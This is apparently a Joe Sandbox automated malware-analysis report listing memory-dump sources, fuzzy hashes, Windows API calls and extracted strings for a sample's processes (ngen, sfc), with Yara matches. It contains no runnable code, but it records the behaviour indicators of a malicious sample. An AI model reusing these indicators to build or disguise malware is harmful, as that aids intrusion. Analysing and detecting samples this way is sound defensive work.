                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e65cf1adffc6d2cf665aa7bfe8da08bd060aaeb86d75012c5aa9791b55dbad4b
                                                                                                                      • Instruction ID: 1994c2283f709b1068e74c442fd3202aeb8de97206ed9cbebe247f111847e0dd
                                                                                                                      • Opcode Fuzzy Hash: e65cf1adffc6d2cf665aa7bfe8da08bd060aaeb86d75012c5aa9791b55dbad4b
                                                                                                                      • Instruction Fuzzy Hash: 6990022224544442D10075585488A16001687E0315FD5D461A10645A9DC6358951B133
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e4b2e2f1b46d62c3c494acef50193a2f208128c5fd19e3f7b7b141f96eab7ff3
                                                                                                                      • Instruction ID: bc79facf807048ce3cc809e5729d5f1dfd4c3bc21dd73ac4a957d005259dfb79
                                                                                                                      • Opcode Fuzzy Hash: e4b2e2f1b46d62c3c494acef50193a2f208128c5fd19e3f7b7b141f96eab7ff3
                                                                                                                      • Instruction Fuzzy Hash: 24900222282441525545B1584484517401797F03517D5C462A1414964C85269956E623
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e0a9e46305da35f8c5795f75cb4ce9526dcb5e532284579fdf42ad2d09f3d8a1
                                                                                                                      • Instruction ID: 3f4e47725315608e8d1a531761750d8ef197bf0c4ce5954077e3ffeec0a3aebf
                                                                                                                      • Opcode Fuzzy Hash: e0a9e46305da35f8c5795f75cb4ce9526dcb5e532284579fdf42ad2d09f3d8a1
                                                                                                                      • Instruction Fuzzy Hash: 3190023228140402D14171584484616001A97E0351FD5C462A0424568E86558B56BA63
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8794ea43f24220c9393088aaa96dfb5c6b8812e596a470aa3848a25cd6864f84
                                                                                                                      • Instruction ID: 5ee7dfed6ecc09e0be6648ddc45329b5ed3c2c0dea207ff9c164de17275a308a
                                                                                                                      • Opcode Fuzzy Hash: 8794ea43f24220c9393088aaa96dfb5c6b8812e596a470aa3848a25cd6864f84
                                                                                                                      • Instruction Fuzzy Hash: E790023224140842D10071584484B56001687F0311FD5C466A0124668D8615C9517523
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e0c2d6ac02fc428cdffb79bfa6e182f71ec87443f0a19561a575bc0fed6194db
                                                                                                                      • Instruction ID: 9b3bb57011d9938f8cca2574ff5c99e29fc36e3445e6746c4e896b39d66ad33a
                                                                                                                      • Opcode Fuzzy Hash: e0c2d6ac02fc428cdffb79bfa6e182f71ec87443f0a19561a575bc0fed6194db
                                                                                                                      • Instruction Fuzzy Hash: B990023224140403D10071585588717001687E0311FD5D861A042456CDD65689517123
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 9b3f4b0f3d254547569e2081499013a3c465f90763428632365a03c0e7f24507
                                                                                                                      • Instruction ID: 1fb2be978897c70f42b02ecaeb9170450def7ddba81dd52eac20eac23dccd83c
                                                                                                                      • Opcode Fuzzy Hash: 9b3f4b0f3d254547569e2081499013a3c465f90763428632365a03c0e7f24507
                                                                                                                      • Instruction Fuzzy Hash: 5990022264540402D14071585498716002687E0311FD5D461A0024568DC6598B5576A3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b42355ddecf6d2dece835645223229cbe9cbc6c388199494c09cef18d9c33b51
                                                                                                                      • Instruction ID: 08c7414ab4993e3784f2a1b57e880df17c72a4fe431cb6467c08fcdcf5e72eeb
                                                                                                                      • Opcode Fuzzy Hash: b42355ddecf6d2dece835645223229cbe9cbc6c388199494c09cef18d9c33b51
                                                                                                                      • Instruction Fuzzy Hash: 6890023224140402D10075985488656001687F0311FD5D461A5024569EC66589917133
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7ba31487080f1d2d836c600ea6e4ce716866556ceaf56b30bbf5d6c1714ab9a3
                                                                                                                      • Instruction ID: fdafba2f745808948d8dd042e82a915a74afd7723ebcdc10bf2cc5ec06930bb4
                                                                                                                      • Opcode Fuzzy Hash: 7ba31487080f1d2d836c600ea6e4ce716866556ceaf56b30bbf5d6c1714ab9a3
                                                                                                                      • Instruction Fuzzy Hash: 7790026225140042D10471584484716005687F1311FD5C462A2154568CC5298D616127
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c719864ddbf3aef7fcc24cba6eb09983e6fefdb6fd8fdc5e9be126a79f7765d6
                                                                                                                      • Instruction ID: 576ba3fa2ed1b35ea7adc09690475bcbacc2736a91523fbaec2903b423cc0805
                                                                                                                      • Opcode Fuzzy Hash: c719864ddbf3aef7fcc24cba6eb09983e6fefdb6fd8fdc5e9be126a79f7765d6
                                                                                                                      • Instruction Fuzzy Hash: 5B90026238140442D10071584494B160016C7F1311FD5C465E1064568D8619CD527127
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8e4e3f16a7b124a432da1b068ea3ba37d893a39fe9383f8004ce0b92dd59a6da
                                                                                                                      • Instruction ID: c285c35f0f93eb03f7bdbadee325ed04774571871eca0df482b637eee26b0a81
                                                                                                                      • Opcode Fuzzy Hash: 8e4e3f16a7b124a432da1b068ea3ba37d893a39fe9383f8004ce0b92dd59a6da
                                                                                                                      • Instruction Fuzzy Hash: 49900222251C0042D20075684C94B17001687E0313FD5C565A0154568CC91589616523
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c1fb9f0e8c165aa127dd0e8252c82b3943ca349ee273b0f11a18ebbc419bb9fd
                                                                                                                      • Instruction ID: dc1d8eca999466c041bfbabaa22c916df1174f0807c60c44972f7cc2e8d4d031
                                                                                                                      • Opcode Fuzzy Hash: c1fb9f0e8c165aa127dd0e8252c82b3943ca349ee273b0f11a18ebbc419bb9fd
                                                                                                                      • Instruction Fuzzy Hash: DE900222641400424140716888C49164016ABF13217D5C571A0998564D855989656667
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 326d33b106cf5a46a4117a65f69dfc6a518ac575ced687bca04928d2ddeceb20
                                                                                                                      • Instruction ID: 312a96896a258c8fce4ccca07a52f2ff83b360fba98695eb6ab101e7ea5d62e6
                                                                                                                      • Opcode Fuzzy Hash: 326d33b106cf5a46a4117a65f69dfc6a518ac575ced687bca04928d2ddeceb20
                                                                                                                      • Instruction Fuzzy Hash: 6190023224180402D10071584888757001687E0312FD5C461A5164569E8665C9917533
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2630fa925b10f92b7ac612d74c2ee7f22dd9f4571025d79ae3d1d041524fb611
                                                                                                                      • Instruction ID: 416e55f51df3a6a4ddbb87b818ce4b5f002c70bf6d5a5168c1aa8949703e28d7
                                                                                                                      • Opcode Fuzzy Hash: 2630fa925b10f92b7ac612d74c2ee7f22dd9f4571025d79ae3d1d041524fb611
                                                                                                                      • Instruction Fuzzy Hash: 3C90023224180402D1007158489471B001687E0312FD5C461A1164569D862589517573
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4e4d6e58d2df08251cdbba7743521301729eb664587630475f653e4e53f0213
                                                                                                                      • Instruction ID: 6dd788750c41620cb57eaa94050e4255bf8ab61327dd89dee61c7f319020b5bd
                                                                                                                      • Opcode Fuzzy Hash: a4e4d6e58d2df08251cdbba7743521301729eb664587630475f653e4e53f0213
                                                                                                                      • Instruction Fuzzy Hash: 5D90022234140402D10271584494616001AC7E1355FD5C462E1424569D86258A53B133
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 23db463c986a4ec1f88d5299a7d7470132dcee94a6d76f52d820e4c37466fe08
                                                                                                                      • Instruction ID: ae9749aa7277d11dd00bdc2f058f458949f045b6e0db72670a83e07527ab4e07
                                                                                                                      • Opcode Fuzzy Hash: 23db463c986a4ec1f88d5299a7d7470132dcee94a6d76f52d820e4c37466fe08
                                                                                                                      • Instruction Fuzzy Hash: 1E90026224180403D14075584884617001687E0312FD5C461A2064569E8A298D517137
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 3bbcd0d268ae94ae1d4d251a58f1081bf87f1e259b0178da28a4fa4ee2d28720
                                                                                                                      • Instruction ID: 69fc11cd03f816874e3d1f91f2fba6494154f97d3158a5e0e7e1b781c9999467
                                                                                                                      • Opcode Fuzzy Hash: 3bbcd0d268ae94ae1d4d251a58f1081bf87f1e259b0178da28a4fa4ee2d28720
                                                                                                                      • Instruction Fuzzy Hash: 4B90027224140402D14071584484756001687E0311FD5C461A5064568E86598ED57667
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: eec20151fe715e7ca49cac85119d6befa3a291ff4f2267e5f044fb66de7d86fc
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                      Strings
                                                                                                                      • ExecuteOptions, xrefs: 057A46A0
                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 057A4725
                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 057A4742
                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 057A46FC
                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 057A4787
                                                                                                                      • Execute=1, xrefs: 057A4713
                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 057A4655
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                      • API String ID: 0-484625025
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-$0$0
                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 057A7B7F
                                                                                                                      • RTL: Resource at %p, xrefs: 057A7B8E
                                                                                                                      • RTL: Re-Waiting, xrefs: 057A7BAC
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 0-871070163
                                                                                                                      APIs
                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 057A728C
                                                                                                                      Strings
                                                                                                                      • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 057A7294
                                                                                                                      • RTL: Resource at %p, xrefs: 057A72A3
                                                                                                                      • RTL: Re-Waiting, xrefs: 057A72C1
                                                                                                                      Similarity
                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                      • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                      • API String ID: 885266447-605551621
                                                                                                                      Similarity
                                                                                                                      • API ID: __aulldvrm
                                                                                                                      • String ID: +$-
                                                                                                                      • API String ID: 1302938615-2137968064
                                                                                                                      • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction ID: 4d171795fb262f78430f9fdab4dbbfe5ff3ee120347fe34c1291d4bcb00b0c98
                                                                                                                      • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                      • Instruction Fuzzy Hash: 9591D3B0F0421E9BDF2CCE69E985ABEB7A6FF44320F54451AE861E72C0D7708942E751
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$@
                                                                                                                      • API String ID: 0-1194432280
                                                                                                                      • Opcode ID: 89918831ddadc4f5256bc34a2407489bf6b4a1010a718da8ccde8fbaf381bdbc
                                                                                                                      • Instruction ID: 65e94584970465375cbc3e3edcad20ad737086ce575a777288e571db5004b243
                                                                                                                      • Opcode Fuzzy Hash: 89918831ddadc4f5256bc34a2407489bf6b4a1010a718da8ccde8fbaf381bdbc
                                                                                                                      • Instruction Fuzzy Hash: 8E812B76D002699BDB35DF54CC49BEEB7B4AB48710F0041DAEA09B7681E7705E84DFA0

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:3.2%
                                                                                                                      Dynamic/Decrypted Code Coverage:4.3%
                                                                                                                      Signature Coverage:1.6%
                                                                                                                      Total number of Nodes:438
                                                                                                                      Total number of Limit Nodes:70

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: {$#$&$'$*h$33$6$7$9y$;$=$?#$B$EI$I$I$L$N}$O$Q$R$R$Z$a$b5$f$g$l$m$n>$p$p0${q$a$s
                                                                                                                      • API String ID: 0-3813558309
                                                                                                                      • Opcode ID: c45f8173c05a1223a1a6a62f14d2a5b6ef5784dd1502008284193c9c4f5aeaf9
                                                                                                                      • Instruction ID: b7587462337f5a49bd145585373db4b7d53e02e4197f934133261972445f5913
                                                                                                                      • Opcode Fuzzy Hash: c45f8173c05a1223a1a6a62f14d2a5b6ef5784dd1502008284193c9c4f5aeaf9
                                                                                                                      • Instruction Fuzzy Hash: 974281B0D0522ACBEB64DF45C9987EEBBB1BB44308F1081D9C5496B381DBB95AC9CF44
                                                                                                                      APIs
                                                                                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A9B8E4
                                                                                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 02A9B91F
                                                                                                                      • FindClose.KERNELBASE(?), ref: 02A9B92A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3541575487-0
                                                                                                                      • Opcode ID: 8f494d78f6053d3683d1143fd56178c1211dd3bce78f95870a8982918ca8c55c
                                                                                                                      • Instruction ID: 2d65091d394913922be7061098c227823c173be88edc30e479d6a569a8891e04
                                                                                                                      • Opcode Fuzzy Hash: 8f494d78f6053d3683d1143fd56178c1211dd3bce78f95870a8982918ca8c55c
                                                                                                                      • Instruction Fuzzy Hash: 57315EB1A502087EDF20EB61DD85FEB77ADAF84708F144458B948A7180DB70AA858BA1
                                                                                                                      APIs
                                                                                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02AA774D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 9bd2a730a09e07d82a855ad11b4d81ceb6f29dde270fb06e65ddc43552f7c8d1
                                                                                                                      • Instruction ID: 11d7ed6e48f50635c1fc4526dd1002ad19e8f4f811edeba1f894266b73616d6a
                                                                                                                      • Opcode Fuzzy Hash: 9bd2a730a09e07d82a855ad11b4d81ceb6f29dde270fb06e65ddc43552f7c8d1
                                                                                                                      • Instruction Fuzzy Hash: 8031C4B5A01608AFCB14DF99D980EDFB7B9AF8C714F108209F918A3340D730A852CFA4
                                                                                                                      APIs
                                                                                                                      • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02AA7895
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileRead
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2738559852-0
                                                                                                                      • Opcode ID: 9f0f689d9cc9475f85af43d48cff8d1af5f0337fc4f30012fa80292427d87117
                                                                                                                      • Instruction ID: 3651c4dac964183dc84542fb058b1590d5bdf1c8779afd4bad90c1f8d51d5a24
                                                                                                                      • Opcode Fuzzy Hash: 9f0f689d9cc9475f85af43d48cff8d1af5f0337fc4f30012fa80292427d87117
                                                                                                                      • Instruction Fuzzy Hash: 7A31E6B5A40208AFDB14DF99D880EEFB7B9EF8C714F108109F918A7240DB70A811CFA5
                                                                                                                      APIs
                                                                                                                      • NtAllocateVirtualMemory.NTDLL(02A913AE,?,02AA6757,00000000,00000004,00003000,?,?,?,?,?,02AA6757,02A913AE,4D8B511C,02A913AE,00000000), ref: 02AA7B37
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateMemoryVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2167126740-0
                                                                                                                      • Opcode ID: 373d7ed562dcf02eac607374093c8c7a6394f6644267429e5629f866888eb908
                                                                                                                      • Instruction ID: d0f8dda985585f805478ab7e7c342d5967c0c5f2c18e1f47d061c6a96dbb49e9
                                                                                                                      • Opcode Fuzzy Hash: 373d7ed562dcf02eac607374093c8c7a6394f6644267429e5629f866888eb908
                                                                                                                      • Instruction Fuzzy Hash: 32211DB1A40208AFDB14DF59DC81EAFB7B9EF88704F008509FD0897240DB75A811CFA5
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: DeleteFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4033686569-0
                                                                                                                      • Opcode ID: 5124bf4b8984e73ccc97a05c76cecb946e3b8b90d29b2799cf4e198b8834b451
                                                                                                                      • Instruction ID: f3ecca79db2ad17b964e033d4fe9976ca19a2d88234bc11f25b4f0954f5d91b4
                                                                                                                      • Opcode Fuzzy Hash: 5124bf4b8984e73ccc97a05c76cecb946e3b8b90d29b2799cf4e198b8834b451
                                                                                                                      • Instruction Fuzzy Hash: 2A0180B2A812047FD620EB68DD55FAB77ADEF89710F004509FB189B280DB7179128BE5
                                                                                                                      APIs
                                                                                                                      • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02AA7961
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4091718758.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_2a80000_sfc.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Close
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3535843008-0
                                                                                                                      • Opcode ID: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction ID: 851637dde383d843f7ceb3682df918001fc43b4766665ec24cdeaa6a581d6c23
                                                                                                                      • Opcode Fuzzy Hash: 47efae5147df12e2a290532262f55778ee760547e7d53fcb4626249dd9ba2729
                                                                                                                      • Instruction Fuzzy Hash: 43E04676640214BFD620EA5ACC01F9B776EDFC5760F408415FA08A7241CA71B9118AE1
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_3170000_sfc.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 7c83a2a8417e0b0cbc1b94269d3d682bb010714b0cdb4f6da3ec2440bd3849f1
                                                                                                                      • Instruction ID: f00587541f07ae35c6866d0ace019cb4f3fe032155ee4456a341ea572162a162
                                                                                                                      • Opcode Fuzzy Hash: 7c83a2a8417e0b0cbc1b94269d3d682bb010714b0cdb4f6da3ec2440bd3849f1
                                                                                                                      • Instruction Fuzzy Hash: B0900231605C04179540B15849845464005D7E5301B55D111E1425554C8B24CA665361
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, Offset: 03170000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.4092885357.0000000003299000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000329D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
